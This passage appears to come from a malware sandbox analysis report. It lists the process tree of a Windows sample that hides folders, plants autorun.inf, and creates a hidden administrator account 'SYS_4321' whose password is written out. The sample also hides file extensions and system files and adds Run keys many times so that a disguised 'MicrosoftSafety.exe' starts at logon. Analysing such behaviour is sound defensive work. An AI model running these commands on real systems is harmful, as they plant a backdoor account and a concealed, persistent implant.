  cmd.exe /c attrib +s +H "C:\Program File"
  2⤵
  PID:1772
- - C:\Windows\SysWOW64\attrib.exe
    attrib +s +H "C:\Program File"
    3⤵
    - Sets file to hidden
    - Views/modifies file attributes
    PID:1320
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c MKDIR "C:\Program File"
  2⤵
  PID:3648
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c attrib +s +H "C:\Program File\Microsoft"
  2⤵
  PID:1316
- - C:\Windows\SysWOW64\attrib.exe
    attrib +s +H "C:\Program File\Microsoft"
    3⤵
    - Sets file to hidden
    - Views/modifies file attributes
    PID:4780
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c attrib +s +H C:\C0MM
  2⤵
  PID:2320
- - C:\Windows\SysWOW64\attrib.exe
    attrib +s +H C:\C0MM
    3⤵
    - Sets file to hidden
    - Views/modifies file attributes
    PID:4712
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c attrib +s +H C:\C0MM\C0MM
  2⤵
  PID:2340
- - C:\Windows\SysWOW64\attrib.exe
    attrib +s +H C:\C0MM\C0MM
    3⤵
    - Sets file to hidden
    - Views/modifies file attributes
    PID:3224
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c attrib -r -a C:\autorun.inf
  2⤵
  PID:2640
- - C:\Windows\SysWOW64\attrib.exe
    attrib -r -a C:\autorun.inf
    3⤵
    - Drops autorun.inf file
    - Views/modifies file attributes
    PID:2016
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c attrib +s +h +r C:\autorun.inf
  2⤵
  PID:4756
- - C:\Windows\SysWOW64\attrib.exe
    attrib +s +h +r C:\autorun.inf
    3⤵
    - Sets file to hidden
    - Drops autorun.inf file
    - Views/modifies file attributes
    PID:2708
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net users SYS_4321 passPass
  2⤵
  PID:3116
- - C:\Windows\SysWOW64\net.exe
    net users SYS_4321 passPass
    3⤵
    PID:1644
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" /v SYS_4321 /t REG_DWORD /d 0 /f
  2⤵
  PID:4688
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" /v SYS_4321 /t REG_DWORD /d 0 /f
    3⤵
    PID:3992
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net localgroup administrators /add SYS_4321
  2⤵
  PID:4344
- - C:\Windows\SysWOW64\net.exe
    net localgroup administrators /add SYS_4321
    3⤵
    PID:4868
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net users /add SYS_4321 passPass
  2⤵
  PID:4112
- - C:\Windows\SysWOW64\net.exe
    net users /add SYS_4321 passPass
    3⤵
    PID:4844
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CLASSES_ROOT\Network\SharingHandler" /v "" /t REG_SZ /d "" /f
  2⤵
  PID:1008
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CLASSES_ROOT\Network\SharingHandler" /v "" /t REG_SZ /d "" /f
    3⤵
    - Modifies registry class
    PID:4392
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 1 /f
  2⤵
  PID:4320
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 1 /f
    3⤵
    - Modifies visibility of file extensions in Explorer
    PID:1308
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 0 /f
  2⤵
  PID:4220
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 0 /f
    3⤵
    - Modifies visiblity of hidden/system files in Explorer
    PID:4824
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg DELETE "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\IniFileMapping\Autorun.inf" /f
  2⤵
  PID:3392
- - C:\Windows\SysWOW64\reg.exe
    reg DELETE "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\IniFileMapping\Autorun.inf" /f
    3⤵
    PID:4516
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system" /v shutdownwithoutlogon /d 0 /t REG_DWORD /f
  2⤵
  PID:3592
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system" /v shutdownwithoutlogon /d 0 /t REG_DWORD /f
    3⤵
    PID:4668
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d " %homedrive%\Program File\Microsoft\MicrosoftSafety.exe" /f
  2⤵
  PID:1652
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d " C:\Program File\Microsoft\MicrosoftSafety.exe" /f
    3⤵
    - Adds Run key to start application
    PID:4108
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 1 /f
  2⤵
  PID:4044
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 1 /f
    3⤵
    - Modifies visibility of file extensions in Explorer
    PID:5104
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 0 /f
  2⤵
  PID:2652
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 0 /f
    3⤵
    - Modifies visiblity of hidden/system files in Explorer
    PID:1824
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "%homedrive%\Program File\Microsoft\MicrosoftSafety.exe" /f
  2⤵
  PID:3788
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "C:\Program File\Microsoft\MicrosoftSafety.exe" /f
    3⤵
    - Adds Run key to start application
    PID:4952
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "%homedrive%\Program File\Microsoft\MicrosoftSafety.exe" /f
  2⤵
  PID:4664
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "C:\Program File\Microsoft\MicrosoftSafety.exe" /f
    3⤵
    - Adds Run key to start application
    PID:3704
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 1 /f
  2⤵
  PID:2244
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 1 /f
    3⤵
    - Modifies visibility of file extensions in Explorer
    PID:3340
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "%homedrive%\Program File\Microsoft\MicrosoftSafety.exe" /f
  2⤵
  PID:3124
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "C:\Program File\Microsoft\MicrosoftSafety.exe" /f
    3⤵
    - Adds Run key to start application
    PID:1856
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "%homedrive%\Program File\Microsoft\MicrosoftSafety.exe" /f
  2⤵
  PID:4192
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "C:\Program File\Microsoft\MicrosoftSafety.exe" /f
    3⤵
    - Adds Run key to start application
    PID:3404
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 0 /f
  2⤵
  PID:3688
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 0 /f
    3⤵
    - Modifies visiblity of hidden/system files in Explorer
    PID:1008
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 1 /f
  2⤵
  PID:2708
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 1 /f
    3⤵
    - Modifies visibility of file extensions in Explorer
    PID:1448
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 0 /f
  2⤵
  PID:4352
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 0 /f
    3⤵
    - Modifies visiblity of hidden/system files in Explorer
    PID:4420
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "%homedrive%\Program File\Microsoft\MicrosoftSafety.exe" /f
  2⤵
  PID:4008
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "C:\Program File\Microsoft\MicrosoftSafety.exe" /f
    3⤵
    - Adds Run key to start application
    PID:2248
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "%homedrive%\Program File\Microsoft\MicrosoftSafety.exe" /f
  2⤵
  PID:1796
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "C:\Program File\Microsoft\MicrosoftSafety.exe" /f
    3⤵
    - Adds Run key to start application
    PID:2764
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 1 /f
  2⤵
  PID:3232
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 1 /f
    3⤵
    - Modifies visibility of file extensions in Explorer
    PID:768
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 0 /f
  2⤵
  PID:488
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 0 /f
    3⤵
    - Modifies visiblity of hidden/system files in Explorer
    PID:4384
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "%homedrive%\Program File\Microsoft\MicrosoftSafety.exe" /f
  2⤵
  PID:2416
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "C:\Program File\Microsoft\MicrosoftSafety.exe" /f
    3⤵
    - Adds Run key to start application
    PID:1920
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "%homedrive%\Program File\Microsoft\MicrosoftSafety.exe" /f
  2⤵
  PID:3460
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "C:\Program File\Microsoft\MicrosoftSafety.exe" /f
    3⤵
    - Adds Run key to start application
    PID:1340
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 1 /f
  2⤵
  PID:3640
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 1 /f
    3⤵
    - Modifies visibility of file extensions in Explorer
    PID:2944
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "%homedrive%\Program File\Microsoft\MicrosoftSafety.exe" /f
  2⤵
  PID:3836
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "C:\Program File\Microsoft\MicrosoftSafety.exe" /f
    3⤵
    - Adds Run key to start application
    PID:4548
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "%homedrive%\Program File\Microsoft\MicrosoftSafety.exe" /f
  2⤵
  PID:3676
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "C:\Program File\Microsoft\MicrosoftSafety.exe" /f
    3⤵
    - Adds Run key to start application
    PID:2532
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 0 /f
  2⤵
  PID:3856
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 0 /f
    3⤵
    - Modifies visiblity of hidden/system files in Explorer
    PID:2200
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "%homedrive%\Program File\Microsoft\MicrosoftSafety.exe" /f
  2⤵
  PID:3616
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "C:\Program File\Microsoft\MicrosoftSafety.exe" /f
    3⤵
    - Adds Run key to start application
    PID:4192
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "%homedrive%\Program File\Microsoft\MicrosoftSafety.exe" /f
  2⤵
  PID:1644
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "C:\Program File\Microsoft\MicrosoftSafety.exe" /f
    3⤵
    - Adds Run key to start application
    PID:4408
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 0 /f
  2⤵
  PID:5080
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 0 /f
    3⤵
    - Modifies visiblity of hidden/system files in Explorer
    PID:4168
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 1 /f
  2⤵
  PID:3988
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 1 /f
    3⤵
    - Modifies visibility of file extensions in Explorer
    PID:2696
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 1 /f
  2⤵
  PID:632
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 1 /f
    3⤵
    - Modifies visibility of file extensions in Explorer
    PID:5056
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 0 /f
  2⤵
  PID:3356
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 0 /f
    3⤵
    - Modifies visiblity of hidden/system files in Explorer
    PID:2132
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "%homedrive%\Program File\Microsoft\MicrosoftSafety.exe" /f
  2⤵
  PID:5036
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "C:\Program File\Microsoft\MicrosoftSafety.exe" /f
    3⤵
    - Adds Run key to start application
    PID:744
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "%homedrive%\Program File\Microsoft\MicrosoftSafety.exe" /f
  2⤵
  PID:2344
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "C:\Program File\Microsoft\MicrosoftSafety.exe" /f
    3⤵
    - Adds Run key to start application
    PID:1276
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 1 /f
  2⤵
  PID:4964
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 1 /f
    3⤵
    - Modifies visibility of file extensions in Explorer
    PID:1920
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "%homedrive%\Program File\Microsoft\MicrosoftSafety.exe" /f
  2⤵
  PID:1320
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "C:\Program File\Microsoft\MicrosoftSafety.exe" /f
    3⤵
    - Adds Run key to start application
    PID:4436
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 0 /f
  2⤵
  PID:2052
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 0 /f
    3⤵
    - Modifies visiblity of hidden/system files in Explorer
    PID:4432
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "%homedrive%\Program File\Microsoft\MicrosoftSafety.exe" /f
  2⤵
  PID:4100
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "C:\Program File\Microsoft\MicrosoftSafety.exe" /f
    3⤵
    - Adds Run key to start application
    PID:2712
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 1 /f
  2⤵
  PID:2340
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 1 /f
    3⤵
    - Modifies visibility of file extensions in Explorer
    PID:4916
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 0 /f
  2⤵
  PID:3832
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 0 /f
    3⤵
    - Modifies visiblity of hidden/system files in Explorer
    PID:908
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "%homedrive%\Program File\Microsoft\MicrosoftSafety.exe" /f
  2⤵
  PID:1664
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "C:\Program File\Microsoft\MicrosoftSafety.exe" /f
    3⤵
    - Adds Run key to start application
    PID:760
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "%homedrive%\Program File\Microsoft\MicrosoftSafety.exe" /f
  2⤵
  PID:4728
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "C:\Program File\Microsoft\MicrosoftSafety.exe" /f
    3⤵
    - Adds Run key to start application
    PID:4008
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 1 /f
  2⤵
  PID:4960
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 1 /f
    3⤵
    - Modifies visibility of file extensions in Explorer
    PID:1480
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 0 /f
  2⤵
  PID:1720
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 0 /f
    3⤵
    - Modifies visiblity of hidden/system files in Explorer
    PID:5036
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "%homedrive%\Program File\Microsoft\MicrosoftSafety.exe" /f
  2⤵
  PID:3784
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "C:\Program File\Microsoft\MicrosoftSafety.exe" /f
    3⤵
    - Adds Run key to start application
    PID:2628
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "%homedrive%\Program File\Microsoft\MicrosoftSafety.exe" /f
  2⤵
  PID:1420
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "C:\Program File\Microsoft\MicrosoftSafety.exe" /f
    3⤵
    - Adds Run key to start application
    PID:4780
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 1 /f
  2⤵
  PID:1476
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 1 /f
    3⤵
    - Modifies visibility of file extensions in Explorer
    PID:3956
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 0 /f
  2⤵
  PID:1768
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 0 /f
    3⤵
    - Modifies visiblity of hidden/system files in Explorer
    PID:4260
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "%homedrive%\Program File\Microsoft\MicrosoftSafety.exe" /f
  2⤵
  PID:492
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "C:\Program File\Microsoft\MicrosoftSafety.exe" /f
    3⤵
    - Adds Run key to start application
    PID:3016
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "%homedrive%\Program File\Microsoft\MicrosoftSafety.exe" /f
  2⤵
  PID:3768
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "C:\Program File\Microsoft\MicrosoftSafety.exe" /f
    3⤵
    - Adds Run key to start application
    PID:2436
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 1 /f
  2⤵
  PID:4208
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 1 /f
    3⤵
    - Modifies visibility of file extensions in Explorer
    PID:4792
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "%homedrive%\Program File\Microsoft\MicrosoftSafety.exe" /f
  2⤵
  PID:4408
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "C:\Program File\Microsoft\MicrosoftSafety.exe" /f
    3⤵
    - Adds Run key to start application
    PID:5020
- C:\Windows\SysWOW64\cmd.exe
